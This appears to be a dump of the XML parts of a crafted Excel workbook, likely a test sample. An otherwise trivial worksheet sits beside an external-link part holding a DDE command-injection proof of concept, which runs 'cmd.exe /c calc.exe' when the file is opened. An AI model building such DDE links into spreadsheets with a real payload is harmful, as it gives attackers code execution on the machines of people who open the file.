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externalLinks/externalLink1.xml><?xml version="1.0" encoding="utf-8"?>
<externalLink xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main">
  <ddeLink ddeService="MSEXCEL" ddeTopic="..\..\Windows\System32\cmd.exe /c calc.exe">
    <ddeItems>
      <ddeItem name="x"/>
    </ddeItems>
  </ddeLink>
</externalLink>
</file>

<file path=xl/worksheets/sheet1.xml><?xml version="1.0" encoding="utf-8"?>
<worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main">
  <sheetData>
    <row r="1">
      <c r="A1">
        <v>1</v>
      </c>
      <c r="B1">
        <f>SUM(A1:A1)</f>
        <v>1</v>
      </c>
    </row>
  </sheetData>
</worksheet>
</file>